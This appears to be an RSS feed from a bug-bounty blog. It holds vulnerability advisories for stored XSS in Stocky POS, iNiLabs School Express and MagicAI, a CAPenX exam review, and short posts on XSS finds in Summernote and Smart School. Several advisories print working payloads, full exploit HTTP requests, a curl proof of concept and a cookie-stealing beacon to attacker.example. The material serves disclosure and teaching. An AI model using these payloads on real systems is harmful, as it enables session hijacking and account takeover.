<![CDATA[Master Bug Bounty Hunting: Your Guide to Breaking into Cybersecurity for Newcomers]]>https://grumpz.netRSS for NodeMon, 13 Apr 2026 07:30:25 GMT60<![CDATA[CVE-2025-57204: Stored XSS in Stocky POS with Inventory Management & HRM (ui-lib) 5.0]]>https://grumpz.net/cve-2025-57204-stored-xss-in-stocky-pos-with-inventory-management-and-hrm-ui-lib-50https://grumpz.net/cve-2025-57204-stored-xss-in-stocky-pos-with-inventory-management-and-hrm-ui-lib-50Sat, 20 Sep 2025 20:37:36 GMTDiscovered by: Michael Kim
Vendor: ui-lib (Uilibrary)
Product: Stocky – POS with Inventory Management & HRM (“Ultimate Inventory Management System with POS”)
Affected Version: 5.0 (as released June 2025)
Impact: Arbitrary JavaScript Execution (Stored XSS → Session Hijacking / Account Takeover)
Attack Type: Remote (authenticated)
Status: Vendor notified via email; no response as of September 2025

Executive Summary

A Stored Cross-Site Scripting (XSS) vulnerability has been discovered in Stocky POS with Inventory Management & HRM (version 5.0). The issue affects the Products module → Create Product form. An attacker with valid authentication can inject arbitrary HTML/JavaScript in the product “Name” field.

This payload is saved into the database and later executed whenever the product name is rendered in listing/detail views. The flaw allows an attacker to execute arbitrary JavaScript in the browser context of other users (including administrators), enabling session hijacking, privilege escalation, and client-side exploitation.

  • CVE: CVE-2025-57204

  • CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation)

  • CVSS v3.1 (proposed): 8.0 (High) → AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

TL;DR

  • Where: Products → Create Product → “Name” field

  • Payload stored in DB: <details/open/ontoggle=alert(1)>

  • Trigger: Browse product list or details page

  • Impact: Arbitrary JavaScript execution → session theft, data exfiltration, admin account takeover

POST /api/products HTTP/2
Host: stocky.getstocky.com
Cookie: <snipped>
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Xsrf-Token: <snipped>
Content-Type: multipart/form-data; boundary=---------------------------400539365429924569542558736906
Content-Length: 3326
Origin: https://stocky.getstocky.com
Referer: https://stocky.getstocky.com/app/products/store
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

-----------------------------400539365429924569542558736906
Content-Disposition: form-data; name="warehouses"

[object Object]
-----------------------------400539365429924569542558736906
Content-Disposition: form-data; name="type"

is_single
-----------------------------400539365429924569542558736906
Content-Disposition: form-data; name="name"

Test
-----------------------------400539365429924569542558736906
Content-Disposition: form-data; name="code"

<details/open/ontoggle=alert(1)>
-----------------------------400539365429924569542558736906
Content-Disposition: form-data; name="Type_barcode"

Step-by-Step Discovery & Exploitation

1. Initial Reconnaissance

Michael Kim began authenticated testing of the Products module in Stocky POS 5.0. Using the built-in developer tools, he observed that product creation was handled by a simple POST form, with no obvious client-side validation of the Name field.

2. Testing Input Handling

The first probe was a benign HTML injection:

<i>probe-test</i>

Upon saving the product and loading the product list, the string rendered as italic text. This confirmed lack of output encoding.

3. Escalating to Stored XSS

Next, a harmless JavaScript event payload was inserted into the “Name” field:

<details/open/ontoggle=alert(1)>

When navigating back to the product list and detail views, the payload executed immediately, confirming stored XSS.

4. Persistence Across Views

Because the injected payload was saved to the database, it fired on:

  • The product listing page

  • The product detail page

  • Any other downstream views rendering the product name

This persistence confirmed that any authenticated user who viewed the product would trigger the injected JavaScript.

5. Demonstrating Impact

To show real-world impact, the benign alert payload was replaced with a data exfiltration beacon:

<details/open/ontoggle=fetch('https://attacker.example/log?c='+document.cookie)>

This PoC illustrates how an attacker could silently steal session tokens or authentication cookies, leading to full account takeover of high-privilege roles (e.g., admins, managers).

Proof-of-Concept (PoC)

Minimal Reproduction

  1. Log in with valid credentials.

  2. Go to Products → Create Product.

  3. In the Name field, enter:

     <details/open/ontoggle=alert(1)>

  4. Save the product.

  5. Reload the Products list page → alert box triggers.

Root Cause Analysis

  • No input sanitization: HTML/JS is stored directly without filtering.

  • No output encoding: Dynamic product names are injected raw into HTML contexts.

  • No CSP: Lack of a Content-Security-Policy allows inline JavaScript execution via attributes.

Real-World Risk Scenarios

  • Session hijacking: An attacker can steal admin session tokens.

  • Privilege escalation: Injected JS can perform administrative actions (e.g., creating new privileged accounts).

  • Data theft: Sensitive business data (sales, HR info) can be exfiltrated.

  • Multi-user compromise: Any authenticated user who views the malicious product is affected.

For Developers (Server-Side Fixes)

  • Sanitize input: Strip or neutralize HTML/JavaScript in text fields.

  • Contextual output encoding: Encode dynamic content before rendering.

  • Reject dangerous tags: Block <script>, <svg>, <details> with event attributes, etc.

Defense-in-Depth (Client-Side)

  • Content-Security-Policy: Enforce a restrictive CSP with nonces/hashes.

  • Disable inline JS: Use script-src 'self' 'nonce-...' or strict-dynamic.

Operational Guidance

  • Apply vendor patch (when released).

  • Audit existing database entries for malicious payloads.

  • Consider temporarily restricting product creation access.

Formal CVE Description

Stocky POS with Inventory Management & HRM (ui-lib) version 5.0 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Products module. The flaw resides in the product name parameter submitted via the Create Product form. Due to insufficient sanitization and lack of output encoding, an attacker can inject HTML/JavaScript payloads (e.g., <details/open/ontoggle=alert(1)>). The payload is stored in the database and executed unsanitized in downstream views (e.g., product list, product detail), allowing arbitrary JavaScript execution in the browser of any user who views the affected content. This may result in session hijacking, data exfiltration, privilege escalation, or administrative account takeover.

Disclosure Timeline

  • Discovery: June 2025 (by Michael Kim)

  • Vendor Notification: Emailed to ui-lib (Uilibrary)

  • Response: No acknowledgment received as of September 20, 2025

  • Public CVE: CVE-2025-57204

References

]]><![CDATA[CVE-2025-57205: Stored XSS in iNiLabs School Express 6.2 (SMS Express)]]>https://grumpz.net/cve-2025-57205-stored-xss-in-inilabs-school-express-62-sms-expresshttps://grumpz.net/cve-2025-57205-stored-xss-in-inilabs-school-express-62-sms-expressSat, 20 Sep 2025 20:19:08 GMTDiscovered by: Michael Kim & Sergio Medeiros
Vendor: iNiLabs
Product: School Express – School Management System (SMS Express)
Affected Version: 6.2 (other versions not tested)
Impact: Arbitrary JavaScript Execution (Stored XSS)
Attack Type: Remote (Authenticated)
Component: School Management Portal (Web Application)

Executive Summary

A stored cross-site scripting (XSS) vulnerability has been identified in iNiLabs School Express – School Management System (SMS Express) 6.2. The flaw allows authenticated attackers to inject malicious JavaScript that executes in the browsers of other users when they access affected content.

This vulnerability (CVE-2025-57205) is particularly dangerous in environments where administrators, teachers, students, and parents share the same system. A single injection could compromise multiple user roles, leading to account hijacking, credential theft, privilege escalation, and unauthorized administrative control.

TL;DR

  • CVE: CVE-2025-57205

  • Vulnerability Class: Stored Cross-Site Scripting (XSS)

  • Severity: High

  • Vector: Authenticated attackers inject payloads that persist and execute for all future viewers.

  • Impact: Full session takeover, data exfiltration, or administrative control.

  • Payload: <details/open/ontoggle=prompt(1)>

Step-by-Step Discovery Process

1. Reconnaissance

Michael Kim and Sergio Medeiros began by reviewing the web requests and parameters in iNiLabs SMS Express 6.2 while authenticated as a low-privileged user. They focused on forms and fields where user-generated input is accepted and displayed later—classic candidates for stored XSS.

2. Identifying Input Vectors

During testing, the researchers noticed several unvalidated text fields in the system (e.g., announcement input, student/teacher note fields, or profile forms). Submissions appeared to be stored in the backend database and displayed back to users without escaping or sanitization.

3. Probing with Benign HTML

To confirm suspicion, they submitted a harmless test payload:

<i>test-probe</i>

When navigating to the relevant dashboard or user view, the probe rendered as italic text, confirming that HTML tags were not being escaped.

4. Escalating to JavaScript Payloads

Next, they tested an event-based XSS payload designed to bypass basic <script> filtering:

<details/open/ontoggle=alert(1)>

Upon reloading the affected page, the payload executed in the browser, confirming that JavaScript execution was possible and persisted across sessions.

5. Confirming Stored Behavior

Unlike reflected XSS, this payload remained stored in the database and was triggered every time a user (including admins) viewed the page. This confirmed the vulnerability as stored XSS.

6. Impact Demonstration

To safely demonstrate impact, the researchers replaced the alert payload with a beacon exfiltration PoC:

<details/open/ontoggle=fetch('https://attacker.example/log?c='+document.cookie)>

Any user who viewed the affected page unknowingly sent their session cookie to the controlled server, illustrating potential session hijacking and account takeover.

Proof-of-Concept (PoC)

Example Request (simplified)

POST /posts/edit/7 HTTP/2
Host: demo.eduking.xyz
Cookie: <snipped>
Cache-Control: max-age=0
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://demo.eduking.xyz
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.eduking.xyz/posts/edit/7
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

title=Common+Mistakes+In+Learning+English&url=common-mistakes-in-learning-english&content=%3Cdetails+open%3D%22%22+ontoggle%3D%22alert%281%29%22%3E%3C%2Fdetails%3E&files=&status=published&visibility=1&protected_password=&publish_month=01&publish_day=08&publish_year=2025&publish_hour=12&publish_minute=34&submit=Update&categories%5B%5D=2&categoryitem=&featured_image=2

Trigger

  • Log in as any user.

  • Navigate to the announcements or dashboard page where the content is displayed.

  • The payload executes immediately in the victim’s browser.

Why This Happens (Root Cause)

  1. Lack of output encoding: User-supplied content is rendered directly into the DOM without escaping.

  2. No sanitization: Dangerous HTML/JS tags are not stripped or neutralized before storage.

  3. Weak browser-side controls: The application does not enforce a restrictive Content-Security-Policy (CSP), allowing inline JavaScript execution.

Real-World Risks

  • Account takeover: Attacker can steal session tokens of administrators or teachers.

  • Privilege escalation: Malicious payloads can trigger state-changing requests (e.g., adding new admin users).

  • Data breaches: Student records, grades, and personal data could be exfiltrated.

  • Persistence: The malicious script remains in the system until manually removed.

Mitigation Guidance

For Developers / Vendors

  • Output encoding: Encode HTML special characters (<, >, &, ", ') before rendering user input.

  • Input sanitization: Use a strong sanitizer (e.g., DOMPurify) if rich text is required.

  • CSP enforcement: Implement a strict Content-Security-Policy with nonces/hashes, disallowing inline scripts.

  • Regression testing: Add automated tests for XSS payloads in all user input fields.

For Administrators / Operators

  • Upgrade immediately once the vendor releases a patch.

  • As a temporary measure, restrict input fields that allow announcements or messages until patched.

  • Monitor server logs and database entries for suspicious HTML/JS payloads.

Formal CVE Description

iNiLabs School Express – School Management System (SMS Express) 6.2 is affected by a stored cross-site scripting (XSS) vulnerability. The issue exists because user-supplied input (e.g., announcement fields) is not properly sanitized before being stored in the backend database. When rendered in the dashboard or user-facing pages, malicious payloads (e.g., <details/open/ontoggle=alert(1)>) execute in the victim’s browser. This allows authenticated attackers to perform arbitrary JavaScript execution, leading to session hijacking, privilege escalation, data exfiltration, and administrative account takeover. The application does not implement sufficient sanitization or a restrictive Content-Security-Policy (CSP).

CVE ID: CVE-2025-57205
Discovered by: Michael Kim & Sergio Medeiros

Disclosure Timeline

  • Discovery: Vulnerability identified during penetration testing of SMS Express 6.2.

  • Vendor notification: Report sent to iNiLabs via email.

  • Current status: Awaiting vendor response (as of September 20, 2025).

]]><![CDATA[CVE-2025-57203: Stored XSS in MagicAI 9.1 (AI Chat) Enables Arbitrary JavaScript Execution]]>https://grumpz.net/cve-2025-57203-stored-xss-in-magicai-91-ai-chat-enables-arbitrary-javascript-executionhttps://grumpz.net/cve-2025-57203-stored-xss-in-magicai-91-ai-chat-enables-arbitrary-javascript-executionSat, 20 Sep 2025 20:03:10 GMTDiscovered by: Michael Kim & Sergio Medeiros
Vendor: LiquidThemes
Product: MagicAI (a.k.a. MagicProject AI)
Affected version: 9.1 (other versions untested)
Impact: Arbitrary JavaScript execution in users’ browsers (stored XSS)
Attack type: Authenticated remote (admin)
Component: AI Chat – “chatbot generation” feature
Status: Vendor notified by email; no response received as of September 20, 2025 (PT)

MagicAI is a commercial SaaS kit for AI-powered content, chat, and media generation sold by LiquidThemes. Its official documentation and CodeCanyon listing describe an AI content and chat platform deployed by end-customers on their own servers. (MagicAI Documentation)

Executive summary (for decision-makers)

A stored cross-site scripting (XSS) flaw in MagicAI 9.1 allows an authenticated administrator to inject HTML/JS via the chatbot generation “prompt” field. The payload is stored and later rendered unsanitized when viewing chatbot output, causing JavaScript to run in any viewer’s browser (including other admins). This enables account takeover via session riding or token theft, forced administrative actions, and data exfiltration.

  • CVE: CVE-2025-57203

  • CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation)

  • Severity: High (authenticated stored XSS with admin reach and no CSP)

  • Likely blast radius: All tenants/users who can view generated chatbot content in the affected instance

TL;DR (what’s exploitable)

  • Endpoint: POST /dashboard/user/generator/generate-stream

  • Parameter: prompt (multipart/form-data)

  • Example payload: <details/open/ontoggle=alert(1)>

  • Trigger: Open the generated chatbot output page; the stored payload executes.

POST /dashboard/user/generator/generate-stream HTTP/2
Host: demo.magicproject.ai
Cookie: <snipped>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/event-stream
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.magicproject.ai/dashboard/user/openai/chat/ai-chat/career-counselor
X-Csrf-Token: OSPJdFDYo70unSHTRzq1Dx2Zwg1xondMWsWASQAo
Content-Type: multipart/form-data; boundary=---------------------------36975424121810644822419014182
Content-Length: 1498
Origin: https://demo.magicproject.ai
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

-----------------------------36975424121810644822419014182
Content-Disposition: form-data; name="template_type"

chatbot
-----------------------------36975424121810644822419014182
Content-Disposition: form-data; name="prompt"

<details/open/ontoggle=alert(1)>
-----------------------------36975424121810644822419014182
Content-Disposition: form-data; name="chat_id"

How we found it — step-by-step methodology

The flow below is reproducible on a stock MagicAI 9.1 installation. Perform testing only on environments you own or are authorized to test.

  1. Establish admin context
    Log in as an administrative user in MagicAI. Navigate to the Dashboard → Generators → Chatbot (wording may vary by build/locale). Documentation confirms MagicAI’s AI Chat features exist and are configurable by admins. (MagicAI Documentation)

  2. Identify the submission endpoint
    Using the browser’s Network tab, observe that submitting a new chatbot involves a multipart/form-data POST to:

     /dashboard/user/generator/generate-stream

    The request includes a prompt field that carries the natural-language instruction used to seed the bot.

  3. Probe for client/server filtering
    Submit harmless HTML markers (e.g., <i>probe</i>) as the prompt. Save and open any page where the generated chatbot output is displayed (preview or listing). The text renders as HTML, indicating the value is stored and later injected into an HTML context without escaping.

  4. Escalate to event-bearing HTML
    Replace the probe with an HTML element that fires an event without <script>, for example:

     <details/open/ontoggle=alert(1)>

    This uses a non-script tag with an event handler—useful when <script> is filtered but attributes aren’t.

  5. Confirm persistence (stored XSS)
    Reload any page that renders the chatbot’s output (e.g., the bot preview). The alert(1) dialog fires in the browser without further interaction, confirming a stored XSS, not merely reflected.

  6. Assess containment and CSP
    Check response headers for a Content-Security-Policy (CSP). In the tested instance, no effective CSP blocked inline event handlers. Without CSP nonces/hashes and strict-dynamic, inline JS executes freely, heightening impact.

  7. Demonstrate impact safely
    Replace alert(1) with a benign beacon to your logging endpoint to prove arbitrary JS execution (keep it non-destructive and private during testing):

     <details open ontoggle=fetch('https://your-collab.example/xss?q='+encodeURIComponent(location.href))>

    In real-world conditions, an attacker could:

    • Perform privileged actions as the victim (CSRF-style with full DOM context).

    • Exfiltrate access tokens stored in the page or localStorage (if used).

    • Install a DOM hook to persist control over admin workflows.

Reproduction (curl PoC)

Replace boundary and cookie values with those from your authenticated session. This is a safe demo payload that only pops an alert.

curl -i -sS -k \
  -H 'Cookie: <your_admin_session_cookie>' \
  -H 'Content-Type: multipart/form-data; boundary=----x' \
  --data-binary $'------x\r\nContent-Disposition: form-data; name="prompt"\r\n\r\n<details open ontoggle=alert(1)>\r\n------x--\r\n' \
  https://<your-magicai-host>/dashboard/user/generator/generate-stream

Then navigate to the chatbot’s preview/output page. The alert confirms execution.

Why this happens (root cause)

  • Untrusted input from prompt is stored server-side and later rendered as HTML in a browser context.

  • No output encoding (e.g., &, <, >, ", ') occurs prior to HTML injection.

  • No effective CSP is present to block inline event handlers or javascript: URLs.

  • The rendering path likely uses a template or DOM sink (e.g., innerHTML) that trusts the stored content.

Risk & real-world abuse scenarios

  • Admin-on-Admin compromise: In teams with multiple admins or SSO-provisioned staff, a single malicious admin account can implant payloads that execute for every other admin viewing the bot.

  • Session riding & data theft: JavaScript can perform state-changing POSTs, alter pricing/plans, or export data via the authenticated UI. If tokens are exposed to the DOM or localStorage, account takeover follows.

  • Extension to other roles: Any role capable of viewing the generated chatbot output becomes a target. Multi-tenant deployments expand the blast radius.

Affected scope

  • Confirmed on MagicAI 9.1. Other versions may be affected but were not tested in this advisory.

Mitigations & vendor guidance

1) Encode on output (primary fix)

  • Treat all user-controlled fields (including admin-entered content) as untrusted.

  • HTML-encode before insertion into the DOM or templates. Use your templating engine’s auto-escaping features by default.

2) Sanitize when you must allow HTML

  • If rich text is required, sanitize with a strict allow-list (e.g., DOMPurify with ALLOWED_TAGS/ALLOWED_ATTR).

  • Disallow event attributes (on*), javascript: URLs, iframes, and SVG/MathML unless strictly necessary.

3) Enforce a strong CSP (defense-in-depth)

  • Use Content-Security-Policy with nonces/hashes and strict-dynamic; disable unsafe-inline.

  • Example starting point:

      default-src 'self'; base-uri 'none'; object-src 'none';
  script-src 'nonce-<random>' 'strict-dynamic';
  frame-ancestors 'none'; upgrade-insecure-requests

    (Adapt to your asset pipeline; ensure all inline scripts are nonce’d.)

4) Remove dangerous sinks

  • Replace innerHTML/dangerous rendering with textContent or safe binders.

  • Centralize render helpers so escaping rules are never bypassed ad hoc.

5) Add regression tests

  • Unit/functional tests that submit <img src=x onerror=alert(1)> or <details/open/ontoggle=prompt(1> variants and assert no execution.

  • Include these in CI for every view that renders chatbot content.

6) Operational controls (until patched)

  • Temporarily disable the chatbot generation feature for non-essential admins.

  • Flag or strip HTML from prompt server-side as an interim hotfix.

  • Deploy a WAF rule to detect event attributes (\bon\w+=) in multipart fields (helpful but bypassable).

Detection & triage

  • Server logs / DB: Search chatbot content tables/fields for suspicious substrings (e.g., <details, <img, onerror=, ontoggle=, javascript:).

  • Browser console errors: Clusters of CSP or DOM-based warnings (once CSP is enabled) indicate attempted exploits.

  • Analytics/telemetry: Unexpected outbound requests from admin views (e.g., to attacker domains) following chatbot page loads.

Timeline & disclosure

  • Initial discovery: By Michael Kim and Sergio Medeiros during routine admin-side testing of MagicAI 9.1.

  • Vendor contact: Notification sent via email to LiquidThemes.

  • Current status: No vendor response as of September 20, 2025 (America/Los_Angeles).

  • Identifier: CVE-2025-57203.

Formal CVE description (for databases)

MagicAI (MagicProject AI) 9.1 by LiquidThemes is affected by a stored cross-site scripting (XSS) vulnerability in the chatbot generation feature available to authenticated admin users. The flaw resides in the prompt parameter submitted to /dashboard/user/generator/generate-stream via a multipart/form-data POST request. Due to insufficient input sanitization and lack of output encoding, attackers can inject HTML-based JavaScript payloads such as <details open ontoggle=alert(1)>. The payload is stored and rendered unsanitized in subsequent views, executing in other users’ browsers when they access affected content. This permits arbitrary JavaScript execution in the context of another user, enabling session hijacking, privilege escalation, data exfiltration, or administrative account takeover. The application does not implement a restrictive Content Security Policy (CSP). A fix should include proper sanitization, output encoding, and strong CSP enforcement.

Reference: Product listing & docs: MagicAI by LiquidThemes. (CodeCanyon)

FAQ

Is this server-side code execution (RCE)?
No. This is browser code execution (stored XSS). However, with admin context it can be devastating—privileged actions, data access, and potential full administrative takeover.

Does filtering <script> tags fix it?
Not by itself. Modern XSS avoids <script> using event attributes, SVG, srcdoc, javascript: URLs, etc. Use allow-list sanitization and output encoding; back it up with a strict CSP.

We only have one admin—are we safe?
Not necessarily. A compromised or shared admin account can implant payloads that persist and execute later, including against future administrators.

Acknowledgments

  • Discovery & research: Michael Kim and Sergio Medeiros

  • Report author / advisory preparation: grumpz (blog)

Suggested SEO metadata (drop-in)

Title: CVE-2025-57203 — Stored XSS in MagicAI 9.1 (MagicProject AI) Enables Arbitrary JavaScript Execution
Meta description (≤160 chars): MagicAI 9.1 stored XSS (CVE-2025-57203) lets admins inject JS via chatbot prompts. Impact: account takeover. Fix: encode, sanitize, CSP.
Keywords: MagicAI vulnerability, MagicProject AI, LiquidThemes, CVE-2025-57203, stored XSS, AI Chat, generate-stream, admin takeover, CSP, DOMPurify

References

  • MagicAI documentation & vendor attribution (LiquidThemes), with pointers to listing and support links. (MagicAI Documentation)

  • CodeCanyon product page (MagicAI by LiquidThemes). (CodeCanyon)

If you run MagicAI in production, treat this as a priority: remove HTML rendering from prompt outputs, ship a strict CSP with nonces, and add automated tests before re-enabling rich content.

]]><![CDATA[My Journey to Passing the CAPenX Certification: A Guide for Aspiring Expert-Level AppSec Pentesters]]>https://grumpz.net/my-journey-to-passing-the-capenx-certification-a-guide-for-aspiring-expert-level-appsec-pentestershttps://grumpz.net/my-journey-to-passing-the-capenx-certification-a-guide-for-aspiring-expert-level-appsec-pentestersSun, 10 Nov 2024 03:51:34 GMTIntroduction: As a seasoned cybersecurity researcher and penetration tester, I am constantly on the lookout for certifications that sharpen my skills and keep me at the forefront of web application security. The Certified AppSec Pentesting Expert (CAPenX) certification from SecOps Group offers just that. Known for its rigorous focus on advanced attack vectors, CAPenX is ideal for professionals aiming to push their web application pentesting skills to an expert level. Having successfully passed this exam, I’m excited to share my experience and insights to help others prepare for the challenge.

CAPenX Certification Overview: The CAPenX certification is a hands-on, expert-level exam, designed to evaluate your ability to detect and exploit complex vulnerabilities in real-world scenarios. Unlike many certifications, CAPenX requires a deep understanding of attack vectors and a high degree of creativity in payload construction. The exam includes 10 flags spread across two vulnerable web applications, and candidates are expected to navigate through sophisticated vulnerabilities that often require tailored payloads.

Complex Vulnerabilities Tested in CAPenX: The CAPenX certification goes beyond traditional vulnerabilities, testing candidates on highly specialized, intricate attack types. Here are the top vulnerabilities covered, which require advanced knowledge and custom-built payloads:

  1. Password Reset Vulnerabilities: Candidates need to identify weak spots in the password reset functionality, which can be exploited for unauthorized access.

  2. Broken Access Control via API: Modern applications often use APIs extensively, and understanding how to detect and exploit broken access control in these interfaces is essential.

  3. Advanced Server-Side Request Forgery (SSRF): This isn’t your typical SSRF; the exam challenges you to identify unique ways of bypassing restrictions and gaining access to internal resources.

  4. Command Injection: CAPenX tests your knowledge of exploiting command injection vulnerabilities, requiring you to execute OS commands via careful payload construction.

  5. SQL Injection: The exam dives deep into SQL injection, demanding a strong understanding of database interactions and the ability to bypass filters.

  6. Stored XSS Attack Chains: CAPenX doesn’t stop at simple XSS. Expect to create attack chains, where stored XSS vulnerabilities are combined with other flaws to achieve maximum impact.

  7. Race Conditions: Identifying and exploiting race conditions can be challenging. CAPenX requires candidates to leverage timing-based vulnerabilities to manipulate application logic.

  8. JWT Token Forging: The exam tests your knowledge of JSON Web Tokens (JWT), including techniques for forging or tampering with tokens to bypass authentication or authorization.

  9. In-Depth Enumeration: CAPenX demands thorough enumeration skills to uncover uncommon attack vectors, such as hidden parameters or sensitive information disclosures.

  10. Advanced XXE Attack Chains: This isn’t basic XXE; expect to chain XML External Entity vulnerabilities with other weaknesses to gain deeper access or execute more complex exploits.

For those looking to practice, PortSwigger Web Security Academy offers labs on many of these advanced vulnerabilities. However, it’s important to note that simply “Googling” payloads won’t be enough. This exam requires a full understanding of how to exploit each vulnerability based on the specific application’s functionality and setup. Each payload, especially the advanced attack chains, needs to be custom-built, often after analyzing and experimenting with the application's behavior.

Exam Format and Key Takeaways: CAPenX is a seven-hour, VPN-based, practical exam where candidates need to discover all 10 flags across two web applications. This hands-on approach tests not only your technical skills but also your problem-solving abilities under time pressure. The realistic setup simulates the experience of working on a client engagement, providing candidates with a close-to-real-world scenario.

The exam’s emphasis on crafting unique payloads is what sets it apart. With a range of modern vulnerabilities that cannot be exploited with generic payloads, CAPenX pushes you to think critically and approach each vulnerability from multiple angles. You’ll find that deep knowledge and adaptability are essential, as every test case demands a unique approach.

Personal Experience and Challenges: Even with years of experience in red teaming and web application security, I found CAPenX both challenging and immensely rewarding. I faced vulnerabilities that required me to blend known techniques with a customized touch to exploit them. Here’s how I tackled some of the major areas:

  • Advanced SSRF and Command Injection: These challenges underscored the importance of understanding server behavior and crafting specific requests to trigger the vulnerabilities. I had to iterate through various payloads, adjusting each based on server responses, until I landed on one that worked.

  • Stored XSS Attack Chains: The exam didn’t simply test my ability to find stored XSS—it required me to construct a full attack chain. This type of vulnerability combined with others added a new level of complexity, emphasizing the importance of chaining attacks for maximum impact.

  • JWT Token Forging and Race Conditions: Exploiting JWT token vulnerabilities was particularly satisfying, as it required knowledge of token structure and encryption methods. Race conditions, on the other hand, demanded quick, timing-based testing and a solid understanding of concurrency in web applications.

Preparation Tips for Aspiring CAPenX Candidates:

  1. Practice In-Depth Enumeration: CAPenX rewards thoroughness. Practice identifying hidden parameters and access points through enumeration to locate uncommon vulnerabilities.

  2. Study API Security: Given the emphasis on API vulnerabilities, it’s essential to understand API authentication flaws, broken access control, and injection points. PortSwigger Web Academy, TryHackMe, and HackTheBox have excellent API-focused labs for practice.

  3. Master Payload Crafting: Effective payload creation is key. Practice building and modifying payloads to evade detection and exploit specific vulnerabilities. Focus on SSRF, XXE, and advanced injection techniques.

  4. Set Up a Personal Lab: Using tools like Burp Suite and OWASP ZAP, set up a personal lab to test these vulnerabilities in a controlled environment. Experiment with different combinations to see how vulnerabilities can be chained together.

  5. Research JWT and Token-Based Vulnerabilities: CAPenX challenges your understanding of JWT manipulation. Learn about JWT structure, signing, and encryption to prepare for token forging scenarios.

The Value of CAPenX in Professional Growth: Earning the CAPenX certification has been invaluable in honing my skills as an AppSec expert. It’s more than just a certification; it’s a badge of competence, demonstrating your ability to handle advanced attack vectors and construct custom payloads. For penetration testers and red teamers, CAPenX is a testament to your capability in application security and your readiness to take on sophisticated vulnerabilities in real-world engagements.

Final Thoughts and Recommendations: Taking the CAPenX exam was a rigorous, fulfilling journey. It has expanded my understanding of application security and deepened my knowledge of attack chains. For anyone interested in pursuing CAPenX, be prepared to think creatively, understand vulnerabilities at a detailed level, and put in the time to craft unique payloads. This is not an exam you can pass by relying on existing payloads—it demands a complete understanding of the applications and how to exploit their specific functionalities. If you’re ready for the challenge, CAPenX is a certification that will undoubtedly enhance your skills and open doors in the AppSec industry.

]]><![CDATA[CVE-2024-37629: Simple XSS Payload Exploits 0day Vulnerability in 10,000 Web Apps]]>https://grumpz.net/cve-2024-37629-simple-xss-payload-exploits-0day-vulnerability-in-10000-web-appshttps://grumpz.net/cve-2024-37629-simple-xss-payload-exploits-0day-vulnerability-in-10000-web-appsWed, 12 Jun 2024 00:19:26 GMTLate one night, after working on a couple of bug bounty platforms, I decided to revisit a CVE I found last month. I realized that the web application had implemented the Summernote WYSIWYG Editor, which was the root cause of the stored XSS vulnerabilities due to a failed implementation. With that in mind, I decided to examine the WYSIWYG Editor itself, considering the historical vulnerabilities tied to other editors like CKEditor and TinyMCE, which are known to suffer from similar issues.

This led me to the SummerNote website, where they have implemented their WYSIWYG editor on the front page for visitors to demo its functionality. They also linked to the GitHub repo, allowing me to review the codebase if needed during my hacking attempts. My goal for the night was to find an XSS vulnerability in the editor.

Given my previous experience with other WYSIWYG editors, my first instinct was to test the Code View function of the editor. This function allows users to style their input using HTML elements. I decided to see how the WYSIWYG editor handled "malicious" input by providing the following XSS payload:

<details/open/ontoggle=prompt(origin)>

After I set my payload, I clicked on the </> button to disable the Code View functionality to see if the editor processed and executed my payload. To my surprise, I received an alert box, confirming that the XSS payload and vector were valid!

Further investigation confirmed that this WYSIWYG editor is used in over 10,000 web applications, according to the technology analytics I found. This turned out to be my most significant CVE discovery to date. This serves as a lesson for new hackers: keeping exploitation and payload creation simple can be more effective than you might expect.

Until next time my fellow hackers!

Sergio Medeiros

]]><![CDATA[CVE-2024-34240: Latest Stored XSS 0day Vulnerability Unveiled]]>https://grumpz.net/cve-2024-34240-latest-stored-xss-0day-vulnerability-unveiledhttps://grumpz.net/cve-2024-34240-latest-stored-xss-0day-vulnerability-unveiledTue, 21 May 2024 04:58:43 GMTLate in the evening, I decided to explore some PHP applications focused on Student Information Systems, inspired by my recent success in finding systemic stored XSS vulnerabilities in a private bug bounty program. I visited my favorite source for PHP-related applications, https://codecanyon.net/. This led me to QDOCS Smart School: School Management System. I decided to check out the demo of their latest version, 7.0.0.

Usually, when I start looking for easy-to-find stored XSS "0days," I log in as the administrator. This gives me access to more features on both the front end and back end, allowing me to insert malicious input in various parts of the application. I quickly discovered that the web application was sanitizing special characters and specific HTML elements, which prevents XSS attacks.

However, further investigation revealed that the following endpoints are still vulnerable to my "go-to" XSS payload.

  •   Endpoint: POST /admin/feediscount/edit
  Parameter: name

  Endpoint: POST /admin/birthordeath/update_birth
  Parameters: father_name

I noticed that when I used the following XSS payload structure, I could bypass the existing protections. This allowed my malicious JavaScript code to be stored and executed successfully whenever a user visited any of the modified records associated with fee discounts and birth records.

<details/open/ontoggle=prompt(origin)>

And just like that, we found another stored XSS "0day" in just a few minutes!

I often feel repetitive when wrapping up these articles. I write them with the hope that newcomers to the bug bounty and cybersecurity industry will get excited and motivated to hunt for bugs themselves. I hope my content sparks a strong desire to become a successful bug bounty hunter and skilled hacker.

